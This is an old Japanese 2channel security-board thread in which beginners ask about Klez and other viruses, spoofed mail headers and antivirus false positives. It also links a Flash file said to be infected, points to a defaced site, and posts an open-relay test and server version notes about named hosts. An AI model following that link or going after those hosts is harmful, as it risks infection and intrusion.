アオカビがつかないよう注意しましょう(アオカビを培養する場合を除く)
定期的に紫外線を照射し、雑菌の繁殖を防ぎましょう(最初の培養を除く)
紫外線で誤って検体を殺してしまわないよう注意しましょう

>>607-608
ご親切に本当に有難うございました。
何とか分かりました。
>・・・Macユーザーですとかいうオチはないよね？
違います、大丈夫です(w

>612
氏ね。

>>604
もう二度とセキュ板来んな

Host（）ｳｨﾙｽ　まだぁ？

age

あ

age

ttp://moon.gaiax.com/home/d_show

なんか中国製flashのウイルスが流行ってるみたいなんだけどどうなの？

ttp://www.miyun.com.cn/yule/flash/game/lianhuanmeng.swf

すみません。なんかハードディスクがいつのまにか満杯になってしまいます。
はじめのうちは色々削除したりしながら空きを作ってたのですが最近なにもファイル
増やしていないのにまた残り20Ｍくらいになってしまいました。確実に
おとといは1Ｇくらい空きを作っていました。ウイルスってことあるのでしょうか？
お願いします。おしえてください。

あぼーん

>>625
得ろ動画をダウソしすぎです。

>>627
そんな事言わないでおねがいしますよ。

>>628
とりあえずOS書け。

>>624
これってどこまでやるとヤバイの？

AD簡でチェックしたが何も入ってない>>624

>>625
最近何かで読んだなあ。詳しいことは覚えてないがウィルスじゃない。
隠しファイルだかなんかが膨れ上がってるんだったか・・・
自分で本屋行ってしらべてみ。結構分厚い本だったぞ。Windows辞典とか・・・

定期あげ

>>625
これは？
http://homepage2.nifty.com/winfaq/wme/trouble.html#489

subjectが　Re:***,sos!　（*** は俺のアカウント名）という
HTMLメールが届いたんですが、
Lztk.scr　と　gms-small[2].jpg　が添付されてました。
KLEZっぽいんですが、何でしょうか？

>>635
まあKlezでしょう。
って何でアンチウイルスでスキャンしないの？

>636
うちのメーラはhtmlメールを開かず、添付ファイルをデコードしないので
ウイルススキャンに引っかからないんですよ
よって添付ファイルを強制的に開かない限り感染の心配ないですけどね

>>625
記憶にあったのは、調べたけど見つからなかった。
じゃあDOSプロンプトから仮想メモリを削除してみる？
ttp://www.zdnet.co.jp/help/tips/windows/w0175.html
もしかするとこれでいいかも。

>618
お前、頭悪いな。ここが何のスレか考えてみろ、ﾆﾎﾝｺﾞﾖﾒﾏｽｶ?
>もう二度とセキュ板来んな
ｵﾏｴｶﾞﾅｰ

>って久しぶりに見たbyねこたん

初心者です。質問ですが　クレズウィルスは
hotmailで開いても感染するのですか？

>>641はマルチ


http://pc.2ch.net/test/read.cgi/sec/1024255721/969

>>642
も同じ穴のムジナだろう。アフォ度はお前が上だ。
答えてやったらイイだろうが。

>>641えーとねぇ・・・


























　　　(V) ∧_∧(V)
　　　　ヽ( ﾟ▽ﾟ)ノ　　オシエマシェーンだ
　 　　　/　 /
　　　　ノ￣ゝ

641=643

馬鹿しかいないね、こういうところ

よろしくお願いします。
先ほど怪しいメールが届きました。
タイトル：次を検索
差出人：0909878****＠jp-k.ne.jp
本文：（空白）
形式：HTML

差出人が携帯電話なので安心して開封してしまいました。
これってウィルスでしょうか？メーラーはOutlook2000、
OSはwindowsME、Klez対策はしてあります。

どなたかコメントください。お願いします。

他で尋ねます。失礼しました。。。

あぼーん

>>649おそらくね
怖いともうなら検索するなり>>1のリンク先でもみて勉強してくれ

何がだろ？？？？
>>649

メールアドレス晒してた

>>652
＞メールアドレス晒してた

あー、うっかりしてました。つぃ。
すいませんでした。ご迷惑おかけしました。

つか自分のだべ
あぶないから気をつけれ

最近、突然現れるようになった症状なのですが
ケーブルの常時接続環境なのに、回線が一瞬だけ切断されるのです。
東風荘等のオンラインゲームをしている時にも
突然切れるので非常に困っています。

ノートンには何も反応しないし、切断時ZoneAlarmも無反応です。
Ad-awareも使ってみました。
ノートンでも発見できない新種のウイルスじゃないかと不安です・・・
どなたか対処法が分かる方がいたら助けてください・・・

肝心なことを書き忘れてました。

回線は必ず約30分に1度の周期で切断されます。
あと同じプロバイダの友人にはこの症状は現れないため、
プロバイダが原因ということは無さそうです。
本当に原因不明です・・・

どうして回線が切れることからウィルスまで話が飛躍するのかがわからない

>突然現れるようになった症状なのですが
ウィルスなりアプリのバッティングなりが原因なら
何かした覚えがあるだろうに
>あと同じプロバイダの友人にはこの症状は現れないため
たった一例でそうでないと言い切れる自信はどこから？

プロバ板にいったほうがいいと思うね

>>657
アプリ系は特に心当たりないです・・・

>たった一例でそうでないと言い切れる自信はどこから？
確かにその通りです。軽率でした。
ただ本当に原因不明なため、ウイルスのせいにすることしか
思いつかなかったのです・・・
ではプロバ板に逝ってきまふ・・・
レス有り難うございました。

フツーに考えて既出の原因の量と可能性なら

回線問題（プロバ・モデム・その他）＞＞＞＞＞＞＞＞＞＞ウィルス

だべよ

>>659
本当に肝心なことを書き忘れていたんですが、
コントロールパネルに【ネットワークとダイアルアップ接続】って
あるじゃないですか？その接続維持時間はリセットされないんですよね。
だから回線問題よりもウィルスの方を疑ってしまったんですよね。
例えば強制的に何処かに接続しようとしているんじゃないか・・・
などの可能性を考えてしまったんです。
あとプロバイダの方にも連絡したんですけど
やっぱり原因不明だと言われて・・・
でも、もう一度回線問題方面（プロバ・モデム・その他）も
調べて直してみます。

ターミナルの設定では？

掲示板がクラックされた時のクラッカーに対しての対処法をおしえていただけませんか？

>>662
スレタイトル見てるか？

>>654
自分のじゃないんですよ（藁
なおさらですよね。
というか、その番号自体が存在しているのか不明ですが。

メールの方は削除しました。

W32/Bare.worm
http://www.nai.com/japan/virusinfo/virB.asp?v=W32/Bare.worm

P2P経由で感染するらしいです。破壊活動は一切行わないらしいです。
こういうウィルスの事なんて言うんでしたっけ？
あと素人質問ですが、これからはP2P経由で感染するウィルスが
増えてくるのでしょうか？既出？

昨日、普通にチャットしてたら、「お前○○県の○○接続だろ」とか言われました。
仕返ししてやりたいので、方法を教えてください、少しは勉強してきました。

>>666
マルチ

>>661
ターミナルの設定を見直してみたのですが、
特に異常は見つかりませんでした・・・

ただ皆さんのレスで
「ウィルスが原因という可能性は低い」ということが
分かったので少し安心できました。
あとは回線自体の問題のようなので
もう少し色々とやってみます。
レス本当に有り難うございました。

>>665
worm（ワーム）ってじぶんで書いてるべ
P2P云々は
あんたみたいなのがいると、まぁばら撒いてみたくなんでないのかね

>>665
そうじゃなくて無害のウィルスをばらまいて、
こういう感染ルートがあるから気を付けろっていう警告みたいな
ウィルスの事だよ。

あとMXは使った事ないです。

>>670
s/>>665/>>669/
逝っています。

改竄されています
http://tx.028.co.jp/

http://whois.nic.ad.jp/cgi-bin/whois_gw?key=028.CO.JP
http://uptime.netcraft.com/up/graph?site=tx.028.co.jp
OS Server Last changed IP address Netblock Owner
NT4/Windows 98 Microsoft-IIS/3.0 18-Aug-2002 219.96.201.22 NTT COMMUNICATIONS CORPORATION
tx.028.co.jpはスパムメールを送信しています。
http://tmp.2ch.net/test/read.cgi/tubo/1026829452/225-228

ホストの検索 - その他の RBL への登録状況
http://www.ordb.org/lookup/rbls/?host=tx.028.co.jp
http://relays.visi.com/nph-l?219.96.201.22
We notified [email protected] and [email protected]
of this listing on Fri Jun 21 18:35:05 CDT 2002.

改竄されたページを見るたび思う

日　本　語　で　書　け　!!!

どこがウイルスなんだろうか(以下略)

>>672
I just Wanna s4y f**k USA Gouvernement And israel
Must Be F**k3d oFF

(´_ゝ`)ﾌｰﾝ　

質問です。

個人で商用サイトを運営しているのですが、
毎日毎日6人（多分･･･）の方からWORM_KLEZ.Hを添付したメールを頂いております。
かれこれもう４ヶ月。
一応警告のメールを何度か出し、
「全く気付きませんでした。ありがとうございました」との
返信は貰ったのですが･･･

私の方は、プロバイダーでウィルスチェックをして貰っているので、
既に駆除済みのものが届きますので心配はないのですが、
プロバイダーからのウィルス検出のお知らせも同時に届くので非常に困ります。

２人のうちの一人は過去のお客様ですのであまり強くも言えずにいたのです。
でもいい加減運営に差支えがでて来たのでウィルスメールのアドバイスHPに
あった方法通り、私のHP上に警告文を乗せようと思ったのです。

プロバイダーからのアラートのおかげで、発信元のアドレスはわかっているのですが･･･
やっぱり晒すのはマズイですよね？
こういう場合はどうしたら良いのでしょうか？

よろしければご意見をお願いしたいです。

>２人のうちの一人は過去のお客様ですので

「６人のうち２人は」の間違いでした。
すみません･･･

ここで聞かれてもなぁ
セキュリティ云々でなくて商売の問題だべ

添付ファイルは受けとんねぇよってページに書いて
添付ファイルはそのままゴミ箱とかに振りわけっとか

なんか矢印等が文字化けしているんですが、これはウイルスなんでしょうか？
あと最大化と最小化、閉じるのとこが意味不明な記号になっているんですが

>>679まずぐぐれ馬鹿
http://www.google.co.jp/search?sourceid=navclient&hl=ja&q=%8D%C5%91%E5%89%BB+%8D%C5%8F%AC%89%BB+%95%B6%8E%9A%89%BB%82%AF

ネタか？どっちにしろお前の頭にはウィルスがいる間違いなくな

>>680
直りました。
ありがとうございます

ウイルスを送りたいのですが、どうすれば・・・？

>>682
メールに添付して送る。メールの送り方わかる？

すいません、教えてください。

webメールでホットメールを使っているのですが、（ブラウザはIE6です）
最近、本文なし・添付ファイルなし・件名のみのメールがよく来ます。
でもメールのサイズが、130〜140KBくらいあります。
添付ファイルがないのでウイルスじゃない気もするのですが、
どうなんでしょう？
それとも、差出人が何かしらのウイルスに
感染しているということでしょうか？

ちなみに差出人は毎回ばらばらで、
普通のプロバイダーのアドレスや、
無料チャットレンタルサイトやネットショップのアドレスです。
（↑ｸﾞｸﾞったら出てきた）
しかし、そのレンタルサイトやネットショップなどのサイトに
訪れたことはありませんし、
普通のプロバイダーのアドレスの人も、
全く知らない人です。

　　

>685
ま、ウィルスでしょう。
実際には添付ファイルがあったんだけど、
デコードミスかhotmail のウィルス対策かで出てこないだけでしょ。
知らない人なんでしょ、差出人は。
だったらあっさりと削除。

PE_FUNLOVE.4099って感染するだけで害は無いって本当でしょうか？
俺のPCは感染してからoutloockの起動が異様に遅くなったり日本語で
入力できなくなったり小トラブルが続発します。
あと、感染してないPCを使わず自力で駆除する方法はないでしょうか。

>>687
これ見る
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionID=2418

謎のメールが会社のメールにも個人のメールにも立て続けに来ている。ひええ。
User.zipってのとSetup.zipてのが添付されてます。これってウイルスでしょ？

個人のにはなんと会社のアドレスから来ているのですが、トレンドマイクロのホームページで検索してもひっかからなかったんだよね。
それでも感染してるのかな。はああ

>>688
そこを熟読した上で訊いてるんだけど・・・
まぁサンクスコ。

>>689件名だの添付ファイル名で正確なウィルス名を割り出せる時代は終わった。
スキャンする気すらないならこんなとこに書き込むな

なんか嫌な書き込みだなぁ。
そんな書き方してると誰も答えてくれなくなるぞ。

>>692は690宛な。

>>687
シマンテックのほうが良さげ
http://www.symantec.com/region/jp/sarcj/data/w/w32.funlove.4099.html

ごめんよ>>688・・・

なんだかいろいろ足りない書込みですまんです。みなさん気が立っているよね。

トレンドマイクロのホームページからウイルススキャンをしても何も検索されなかったPC（会社の）から、謎の添付ファイルが送られて来ているということです。
会社でやりとりをしている所で感染してしまったPCがあり、そこがうちの会社を差出人として私宛にメールを送っているんではないかと、その感染したPCの持ち主は言ってます。（会社のと私のと両方のアドレスがそこには入っている）
でもそんなのってありえますか？差出人まで偽装なんてしませんよね？

>差出人まで偽装なんてしませんよね？
(ﾟДﾟ)ﾊｧ?

　　＿_　　　　　　 　＿_　　　　　　　＿_
　 |よし|　ΛΛ　　|よし| ΛΛ　　　|よし|　ΛΛ 　　／￣￣￣￣￣￣￣￣￣￣￣￣￣
　〃￣∩ ﾟДﾟ）　〃￣∩ ﾟДﾟ）　　〃￣∩ ﾟДﾟ） ＜　全員一致で逝ってよし！
　　　　ヾ.　 　）　　　　ヾ.　 　）　　　　　ヾ.　 　） 　　＼＿＿＿＿＿＿＿＿＿＿＿＿＿
￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣＼
＼　　　　　　　　　　　　　　　　　 　 　 　 　 　 　 　 　 　 　 　 　 　 　 　 ＼
　 |￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣　|
　 |　　 　　　　　　　逝ってよし認定委員会　　　　　　　　　　　 　 　 　 　 |
　 |　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　 　 　 　 　 |
＼|　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　 　 　 　 　 |

>>696 勉強不足
http://www.nai.com/japan/virusinfo/klezezukai.asp

つか君の会社のPCはもう色んなところにウィルスメールを送り続けてるかもね

>>696
Klezスレ読んだこと有る？てか、KlezがReturn-Pathなどを偽装するなんてこと、もう10年まえから常識だと思ってたYO！
それで、チミはメールのチェックはできているの？ウィルス対策ソフト入れてないって言ったらぶっとばすよ？

もう10年まえから常識だと思ってたYO！��(･∀･)ﾝﾅﾜｷｬﾅｲ!!

ってゆっかおまいんところに来たメールの添付ファイルをスキャンすれ

アンチドート簡易版
http://www.vintage-solutions.com/Japanese/Antivirus/Super/index.html

>>696
会社名教えれ

>>689
>トレンドマイクロのホームページからウイルススキャンをしても

どゆ職場かは知らんが。
感染の疑いがあるパソはLANから切り離す、これ常識。

Return-Pathかもしれぬが、よー分からんのが実情。

689は失踪したようですな(w

>みなさん気が立っているよね。
んなこと言わなきゃいいのに

>689 半分ﾈﾀかと思っていたが、雲隠れしたところを見るとﾏｼﾞだったんだな

漏れの知人にさぁ。
相手を怒らすような事を自分から散々言ったくせに、とうとう相手が怒ると、「あんたは気が短い！」とか「私はこんなに困っているのに！なぜいじめるの！」ってわざとらしく騒ぐヤシがいる。

ちょっと、いや、かなり怖い。

http://pc3.2ch.net/test/read.cgi/win/1028266693/

初心者に冷たい人ばかり
http://mentai.2ch.net/mukashi/entrance/kako/953/953264364.html

去ログ・歴戦の勇者たちの嘆き。
1st http://pc.2ch.net/win/kako/1013/10139/1013922363.html
2nd http://pc.2ch.net/win/kako/1019/10192/1019226654.html
3rd http://pc.2ch.net/win/kako/1022/10226/1022692960.html
4th http://pc.2ch.net/win/kako/1024/10249/1024932195.html
5th http://pc3.2ch.net/test/read.cgi/win/1026132381/l50

俺が初心者の頃２ｃｈはなかった
俺が初心者の頃パソコン通信なんてもっとコワイ奴らでいっぱいだった
俺が初心者の頃検索エンジンにマシな情報は引っかからなかった
俺が初心者の頃常時接続なんかなくって電話代の請求書ほど恐ろしいものはなかった
俺が初心者の頃PCはﾜｹﾜｶﾗﾝ落ち方をした何でOSが落ちたかなんてわからんかった

今お前らは恵まれていることを忘れるな

>>710 それ、前にも貼ってなかった？

http://pc3.2ch.net/test/read.cgi/win/1028266693/
にあほ上司や、知人のあほサポート依頼の顛末を書き込んでください。

これﾜﾗﾀ

http://osietekun.tripod.co.jp/

>>714 この教えて君は病気じゃないのか(w

ちんぱらって本当カスだね。誰がCD買うの？

>>685-686
ありがとうございます。
今までは、ちょっと気にしつつ考えつつ削除していたのですが、
これからは容赦なくばっさり削除することにします。

ttp://ex.2ch.net/entrance/subback.html
ここは見てのとおりラウンジのスレッド一覧ですが
昨日か一昨日　なんかノートン先生のウィルス警告が出たんです
どうやら２月前くらいにはやってたウィルスソースに誤反応した見たいなんですが
スレタイにソースがあったわけではないのになぜ反応したんでしょうか
同じような症状になった方いませんか

>>718 じっくり読んでください
ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/

質問があるのですが、どなたか教えて頂けませんか？
わたしが使っている一つのメールアドレス（一般的な有料プロバイダ）に、
今月だけで数えると、１８件のウイルス付きメールが来て、
その全部のヘッダーに以下の表示があるのです。

Received: from unknown (HELO smtp.yukaido.ne.jp) (210.230.82.4)
Received: from jxxxxxx.ap.plala.or.jp (218.224.xxx.xx)

ちなみに差出人表示は１７人分で、それぞれドメインはバラバラのようです。
（一人だけ２通）

こういう状態で何ヶ月か続いてるので、誰かに嫌がらせされてるのかと
思うのですが、どこに聞くのが一番良いのでしょうか。
この愉快堂、もしくは、plala に聞けば、なにかしらの糸口は見えるのでしょうか？

なにか情報が足りなければ、追加でまた書き込みますので、
どうかよろしくお願いします。

愉快堂ってなによ？どっかからのコピペ？
ま、おそらくklezだと思うけど

図解：Klez.e・klez.hとはどんなウイルスなのか？
http://www.nai.com/japan/virusinfo/klezezukai.asp
ここと
Klez.E、Klez系スレッド part4
http://pc.2ch.net/test/read.cgi/sec/1030175440/l50
ここの1と2あたりを読んで自分で考えてみれ

愉快堂ってISPなのか
・・・さてと首でも吊ってきますか

早速のお返事ありがとうございます。
おっしゃるようにノートンの表示は W32.Klez.H@mm になってまして
下側のリンクで調べてきました。
どうやら plala に感染者がいるようなんで、問い合わせのメールを
送ってみます。

調べ方が悪かったようでお手数をおかけしましたが、とにかく
素早い返事をありがとうございました。

ちなみに愉快堂（=yukaido）のつもりでした。失礼しました。

http://www.nanet.co.jp/rlytest/relaytest.html
smtp.yukaido.ne.jp
<220 smtp.yukaido.ne.jp ESMTP
>HELO rlytest.nanet.co.jp
<250 smtp.yukaido.ne.jp
>MAIL FROM:< TESTwww.nanet.co.jp/rlytest/requestedfrom[61.211.31.103]@smtp.yukaido.ne.jp >
<250 ok
>RCPT TO:<rlytest＠nanet.co.jp>
<250 ok
>QUIT
<221 smtp.yukaido.ne.jp
問題あり：不正な中継を受け付けます。
(210.230.82.4)
ORDB database...登録されていません。
maps realtime blackhole list...登録されていません。

ホストの検索 - その他の RBL への登録状況
Host: smtp.yukaido.ne.jp (210.230.82.4)
http://www.ordb.org/lookup/rbls/?host=smtp.yukaido.ne.jp
http://dsbl.org/listing.php?ip=210.230.82.4&submit=Retrieve+Information
http://njabl.org/cgi-bin/lookup.cgi?query=210.230.82.4
210.230.82.4 is listed as either an open relay or direct spam source.
The following comment is associated with this record: relay tested
It was added to the list: Sat Dec 8 00:54:03 2001 EST
http://openrbl.org/ip/210/230/82/4.htm

http://ordb.org/translation/#not_a_relay
ファイヤーウォール等によりアクセス制限を行っているサイトでは、
ORDB.org からの通信が拒否されることがあります。
この場合は当方の中継設定に関する検査は行えません。
smtp.yukaido.ne.jpは不正中継を受け付けるがORDB未登録。

http://uptime.netcraft.com/up/graph?mode_u=off&mode_w=on&site=mail1.yukaido.ne.jp
http://uptime.netcraft.com/up/graph?site=m1.yukaido.ne.jp
OS Server Last changed IP address Netblock Owner
FreeBSD Apache/1.3.26 (Unix) 31-Aug-2002 210.230.82.5 Yukaido shuppan (Sato,Tsutomu)

Last changed 31-Aug-2002 設定し直した？？？？？

http://uptime.netcraft.com/up/graph?site=www.yukaido.ne.jp
OS Server Last changed IP address Netblock Owner
FreeBSD Apache/1.3.6 (Unix) 23-Nov-2000 210.230.82.29 Yukaido shuppan (Sato,Tsutomu)

Apache/1.3.6 古くないか？？？？？？？

http://uptime.netcraft.com/up/hosted?netname=YUKAIDO-1,210.230.82.0,210.230.82.255
にhttp://vill.kuni.gunma.jp/群馬県六合村公式ページがあるが、
Apache/1.3.4だが危なくないか？？？？？？？

　最近、知らない人から本文無しなんだけど容量がやたらでかいﾒｰﾙが来る…
添付ﾌｧｲﾙとかないんだけど。件名が、Language(だったかな?)とか書いてある。

>>727
ふーん、よかったねぇ

>>727
ここは近況報告をするためのスレですか。

2ｃｈのえっちねたの過去ログ見ようとするとVBS.Loveletter.A
に感染しました、と警告が出るんですけどこれは俺のせいですか？
メールは使って居ないのでそこから感染した訳ではないと思うので
不思議です。誰か謎を解明してください。

>>730謎なんかとっくの昔に解明されてる、お前が馬鹿だから知らないだけ

ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/l50

>>727
添付ファイルのデコードに失敗しただけなんではないでしょか。

>>731
うわーん。馬鹿って言うなよ。
知らなかったんだから。でも教えてくれて
ありがとう。助かりました。

シマンテックのKlez.Hのページから引用ですが、これについて質問なんです。

> Windowsのアドレス帳、ICQデータベース、ローカルファイルから探し出した
> メールアドレスすべてに対し、自分自身を添付した電子メールを送りつけます。
> 差出人のアドレスは、感染先コンピュータ上で発見したメールアドレスから
> ランダムに選択されたものが使用されます。

これは、送信者は一人だけが選ばれるのでしょうか？それともある程度複数？
届いたウィルスメールの中に、自分が送信者になったものが今の所無いので
全員が送信者にさせられる、って事はないでしょうけど。

> そのメールの受信者が適切な修正プログラムが適用されていないMicrosoft Outlook または
> Outlook Expressで受信した場合、添付ファイルが自動的に実行される可能性があります。

又、感染に気付かない時は繰り返し発信するようですが、自動実行のタイミングと言うのは
PCを起動した時なのか、OEを起動した時なのか、それとも回線を接続した時？（繋ぎっぱの場合は？）
そして送り続ける時は同じ送信者名なのか、毎回違う名前に変わるのか・・・？
いろいろ聞いてしまいましたが、ご存知の方よろしくお願いします。

>>730
かわいいなぁ

有るところから、しつこくウイルスメールらしきモノが来ます。
ヘッドが以下のようになっているんだけど、

Return-Path: [email protected]
Date: Sun, 1 Sep 2002 17:10:13 +0900 (JST)
From: cccccccc <[email protected]>
To: xxxxxxxxxx.ne.jp

のようになってるんだけど、（xxxxxxは当方のアドレス）
このメール、aaaaaaaから来てるのか、ｃｃｃｃｃｃから来てるのかどっちでしょうか。

>>736
どちらも信用できないことがある。
もしKlezなら当然。

>>736

ﾅｺﾞﾔ(･∀･)ﾔｯﾄｶﾒ!!

ｱﾜﾕｷ(･∀･)ｳｨﾛｳ!!ﾀﾞｷﾞｬｧ

股、北!!!!!!!!　KlezH
Received: from smtp01.asahi-it.com (EHLO smtp.asahi-it.com) (210.174.168.200)
by **
Received: from Ewhohgn (p78a29e.kngwnt01.ap.so-net.ne.jp [61.120.162.158])
by smtp.asahi-it.com (8.11.1/3.7W) with SMTP id g813ul093665
for <.co.jp>; Sun, 1 Sep 2002 12:56:47 +0900 (JST)
Date: Sun, 1 Sep 2002 12:56:47 +0900 (JST)
Message-Id:< [email protected] >
From: onio <onioni____________＠juno.ocn.ne.jp>
To: [email protected]
[email protected]
[email protected]
[email protected]
[email protected]
Subject: (c) 2002 multi Allright reserved.

>>738
即、消したけど、
The Garden of Eden
なんて書いてました。

asahi-it.com klezを検索すると、
http://www.scramble-egg.com/virusinfo.htm
http://yuri.robot.mach.mie-u.ac.jp/~virusstat/old_log_1.html
に旭いっとがある。

http://yuri.robot.mach.mie-u.ac.jp/~virusstat/old_log_1.html
は三重大学情報処理センターだが、
只今までに検出されたウィルス 本日分（リアルタイム更新）
http://yuri.robot.mach.mie-u.ac.jp/~virusstat/today_log.txt
にquixnet.net、pref.mie.jpがある。
これは不正中継を行うようだ。
mail.quixnet.net (pri=10)
問題あり：不正な中継を受け付けます。
(63.65.123.12)
ORDB database...登録されています。
maps realtime blackhole list...登録されていません。

mj.pref.mie.jp (pri=10)
<<< 220 CheckPoint FireWall-1 secure SMTP server
問題あり：不正な中継を受け付けます。
(61.114.229.2)
ORDB database...登録されていません。
maps realtime blackhole list...登録されていません。
http://uptime.netcraft.com/up/graph?mode_u=off&mode_w=on&site=www.pref.mie.jp
The site www.pref.mie.jp is running Microsoft-IIS/5.0 on Windows 2000.

WINDOWSBOMB.Eって何者でしょうか?
どこを探しても載っていないようです。
どなたかご返答お願いします。

>>744
http://www.trendmicro.co.jp/vinfo/virusencyclo/default2.asp?m=q&virus=windowbomb&alt=windowbomb

放置されっぱだ・・・(ρ_･｡) ｸｽﾝ
マルチたんの気持ちがﾁｮﾄ判る罠

>>734 1つの詐称アドレスを使い続けるのかは確証がないので答えにくい。
気になるなら閉鎖環境で感染させて調べてみてくれ(w

Klezは自前のSMTPで送信するので感染後はOEの起動は関係ない。Windowsの起動時。こ
れはシマンテックやトレンドマイクロのサイトでわかること。
答えにくいことや調べればわかる質問は放置されるぞな。放置に理由あり。

>745さん。
ありがとうございました。
以前変なリンクをクリックしたらホモのブラクラ
に引っかかったのでその時ですね。
ほっておいても大丈夫そうですねー

昔から女にはもてなかったが、昨日はひどいいわれかたで馬鹿にされた
同じように女に馬鹿にされつづけた人俺の復讐に協力してくれ
こんなむかつく女に携帯が使えなくなるようにメールボムを送ってやたい

>>749
この板は、LANや個人のPCへの侵入、トロイ、ウィルス等、
様々なネット上の危険からの防御法や対策を語りあうための板です。
掲示板の荒らし方や侵入の方法、メールボムの送り方等、
攻撃方法の質問はご遠慮下さい。
2ちゃんねるでは荒らし依頼は出来ません。
また、この板ではアタック依頼は受け付けません。
攻撃依頼を見かけた方は、放置してください。
ネット犯罪の被害者になってしまった方は、まず警察にご相談下さい。

>>749
本当にしょぼいやつ（ｗ

２ちゃんのレスの名前のところをクリックすると、時々自分のアドレスに登録している情報が載っていることがあるんですけど…
これってやっぱりウィルスですよね。
どなたか解決策を教えてください

>>752
クッキー？？？

返答ありがとうございます。
そもそもクッキーって名前はしっているけど、どういうものかしらないほどのど素人なものでして…
もっと勉強しなきゃだめですかね？
こっちがＰＣ原人じゃ説明しようもないでしょうし。
すんませんです

>>754
ブラウザから設定できるクッキー。
IE6ならプロパティ→全般タブ→インターネット一時ファイル→Cookieの削除、かな。

ちゅうか漏れ、検証していないんだけど（だってどの板かわからんし、2chにクッキー取られたくないし
どでしょ。

>>755E-mail
まずは返答ありがとうございます。ためしてみます。
一応具体的に述べますと、「E-mail」のところにスペースをいれた書き込みにかぎり、そのE-mailにメールアドレスからランダムで名前が乗るような症状です（ちなみにこのレスのE-mailにもスペースを入れいております）。
トレンドマイクロにも聞いてみたのですが、「よくわからん」との返答でした…
こういうウィルス（？）などに対してはノートンやウィルスバスターを購入すればいいのでしょうか？
自分のような無知な人間はウィルスＨＰに書いているような対策は知識がなさすぎて実行できないものでして。
なにかいい製品がありましたら、ご紹介いただければ幸いです。
でも、面倒な場合はレスは結構です。
本当にありがとうございました。

あと、あげてしまってすみません。

>>756
漏れそゆ症例、知りませぬ。
メアド抜きなんてブラウザの設定を固めていれば、まず無いことだし。クッキー抜きとか、Java Scriptの設定を甘くしていると、抜かれたりすることはありまするが。

お力になれずにスマンっす。

本当にありがとうございました。
親切に対応していただきまして、ただただ感謝です。
いただきました意見を参考にさせていただきたく思います。
どうもありがとうございました。

これのことか？

どれ？

>>752
で、何をもって君はウィルスと決めつけたのだ？
トレンドマイクロにTELして仕事の邪魔して迷惑かけるより
初心者板の過去ログ見なさい。何度も出とる。
ここじゃ板違い。

>>752
>>761
名前のところをみれ!!

>>752
>>760

すまん、愚痴らせてくれ........

Klezが50通くらい来た(webメールは"壊れたメール"で一杯で激重に)
んで、ヘッダ見たら最下段のReceiveとReturn-Pathが2通を除いて同一
だった。
これは間違いないだろと思ってメルアド検索したら
HPに辿り着いた。(geocities.co.jp/MusicHall-Horn/5237/ )

掲示板に何度も警告を書いたが何度やっても消された。
その間にもわらわらウィルスは来る。
そして、数日後本人はようやく気付いたようだった。
その時の奴の掲示板での一言。

>泣いちゃうわ！
>
>今ハヤリの「ｋｌｅｚ」とかってヤツに感染してもうた！！！
>♪あ〜あ　やんなっちゃった〜　あ〜あ　驚いた♪（ｂｙ牧伸二）
>もしかしたらklezを作ったヒトがここ読んでるかもしれないから言って
>おくけど（まずありえんけどな）、こんなすごいウイルスつくるくら
>いの頭脳があるなら、もっと有効な使い方をしなさい！！
>みなさんもご用心♪
>
>遅れたけどおニャン子再結成おめでとう。

これじゃウィルスが無くなるわけがない。
コイツン中じゃ Klez=おニャン子再結成レベル。
こんなんばっかなのか？
そして、その後３日間きっちりとウィルスは来た。

鬱だ。

プロバは、片手間にCATVやってる業者でメールも読んでないみたいで
返事はねぇし。鬱だ。

長文スマソ。読み流してくれ........逝ってくる

しらない間にアイコンが別のものに変わってるんですが、
これはウイルスですか？

>>764
ﾝﾃﾞ､お宝添付ﾌｧｲﾙは何か有ったのか？？
まさか､50通もそのまま捨てたんぢゃ無いだろうな。。
・・・・ﾓｯﾀｲﾅｲ

>>764
ｴｸｾﾙで顧客のﾒｱﾄﾞ管理してるｱﾀﾞﾙﾄｸﾞｯｽﾞの通販業者からなら面白いのにな。
Klez.Hのばあい。

>>764相手の馬鹿さ加減は見届けてやったから元気出してがんがれ

コンピューターウイルス集めＤＢ化　総務省、対策研究
http://www.asahi.com/national/update/0903/018.html

…住基ネットに流出しないことを祈るばかりだ(w

>>770
>計画では、研究機関や企業に呼びかけて体制を組む。実際に出回っているウイルスを
企業や個人から提供してもらうほか、

ﾓ､漏れのｺﾚｸｼｮﾝ、、、ﾋﾄｸﾁ幾らで買ってくれるかな。。。。
つか、自作ｳｲﾙｽとか買ってくれるんかな．．．

ｻｲﾄ作ってｱﾋﾟｰﾙするかな ﾊｧﾊｧ････

＞ウイルス対策のワクチンソフトや感染をチェックするソフトの開発を手がける企業と競合して
＞「民業圧迫」と批判を招かないよう、研究のための情報の蓄積や提供にとどめるという。

骨抜きの悪寒…

>>771
一攫千金。。。。。にゃ
>>772
そ言えば、日本国内のアンチウイルスソフトベンダーって、「株式会社山田洋行」だけだったような記憶。
あ、ブックマークが死んでる。

お気に入りのフォルダから２ちゃんの自作板を選択して
（http://pc3.2ch.net/jisaku/）を開いただけでノートンが反応し
Macro.srcに感染しました修復できませんってメッセージが出ました。
どうしてこうなっちゃったのか？？です。
￥LocalSettings\TemporaryInternetFiles￥ContentIE5￥0123H67￥jisaku2
はMacro.srcウィルスに感染しています。
このファイルを修復できません。ってスキャンしたら出ました。

>>774 （ ´,_ゝ｀） ﾌﾟｯ

>>774
誤検出らしですけど。

ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/

>>776
ありがとう、そのようですね。
慌てて過去ログ読んでいませんでした。
でもトップページで誤検出するとは、まいりました。

すいません、番組実況板や自動車板等の２ちゃんの特定の板に逝くと
マイクロメディアからﾌﾗｯｼｭ６をダウンロードしる！みたいなのが
毎回確実に出るんですが、これってウィルスとかの可能性ありますか？
マジで困ってるので教えてください

インターネットセキュリティーが先ほどから高危険度の通信を浮けまくってます。
IPが何個かわかるのですが、そのIPから相手を特定すると買ってできるのですか？
もしよければここに吊るし上げます。
本当に次から次へ来て、困っています。
環境はwin2000です。

